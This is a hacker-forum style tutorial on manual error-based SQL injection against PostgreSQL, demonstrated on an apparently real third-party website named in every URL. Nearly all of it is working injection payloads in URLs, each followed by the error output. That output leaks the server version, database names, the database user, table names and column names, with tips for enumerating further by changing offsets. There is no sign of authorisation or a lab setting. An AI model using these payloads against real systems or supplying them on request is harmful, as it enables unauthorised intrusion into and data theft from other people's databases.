Manual sql injection tutorial: Postgre Error based !!!

                   

Postgre:

Traditional relational database management systems (DBMSs) support a data model consisting of a collection of named relations, containing attributes of a specific type. In current commercial systems, possible types include floating point numbers, integers, character strings,
money, and dates.

Lets start to play with Postgre:
we have a sql error based vulnerable website:1st Step find the vulnerability:

Code:

http://www.creatop.com.cn/index.cfm?MenuID=80'

ERROR: syntax error at or near "''"
its mean this website can be injected.remember errors can varies you wont get the same error every time.2nd Step Columns count:

Code:

http://www.creatop.com.cn/index.cfm?MenuID=80 order by 1--

get valid page

Code:

http://www.creatop.com.cn/index.cfm?MenuID=80 order by 2--

Error Executing Database Query.
ERROR: ORDER BY position 2 is not in select list
That Error shows that there is one column.Lets try UNION SELECT query:

Code:

http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=2 UNION SELECT 1--

Error Executing Database Query.
ERROR: UNION types character varying and integer cannot be matched

Seems like UNION SELECT query is not working !!!


Lets try Errorbased Postgre SQLi…

3rd Step:

Code:

http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast(version() as int)--

ERROR: invalid input syntax for integer: "PostgreSQL 8.4.5 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Ubuntu 4.4.3-4ubuntu5) 4.4.3, 32-bit"

As we can see we got version of postgre DB server in the form of error.Lets move on and find database name.

Code:

http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select datname from pg_database limit 1 offset 0) as int)--

Error Executing Database Query.

ERROR: invalid input syntax for integer: "scoutsqld"
Scoutsqld is 1st database name you can variey offset to get other databases names.

scoutsqld is first database we can get others by changing offset :)

Code:

http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select datname from pg_database limit 1 offset 1) as int)--

Error Executing Database Query.
ERROR: invalid input syntax for integer: "template0"
template0 is 2nd database so you can increase offset till you got error.Lets find out the user:

Code:

http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select user from pg_database limit 1 offset 0) as int)--

Error Executing Database Query.

ERROR: invalid input syntax for integer: "postgres"

postgres is the user :)Lets find the tables :>
4th step:

Code:

http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select table_name from information_schema.tables  limit 1 offset 0) as int)--

Error Executing Database Query.

ERROR: invalid input syntax for integer: "pg_type"

pg_type is first table we can get others by changing offset :)5th step:

Now we have to find the columns from our specific table !!!

e.g

our table is action

for that we have to use oracle char conversion.Pg_type= CHR(112) || CHR(103) || CHR(95) || CHR(116) || CHR(121) || CHR(112) || CHR(101)

so our query is :

Code:

http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select column_name from information_schema.columns where table_name= CHR(112) || CHR(103) || CHR(95) || CHR(116) || CHR(121) || CHR(112) || CHR(101)  limit 1 offset 0) as int)--

Error Executing Database Query.
ERROR: invalid input syntax for integer: " typname "
And further you can find the columns using offset..Last step:
Now we have to extract data from our column .

Code:

http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select typname from pg_type limit 1 offset 0) as int)--

Error Executing Database Query.
ERROR: invalid input syntax for integer: "bool"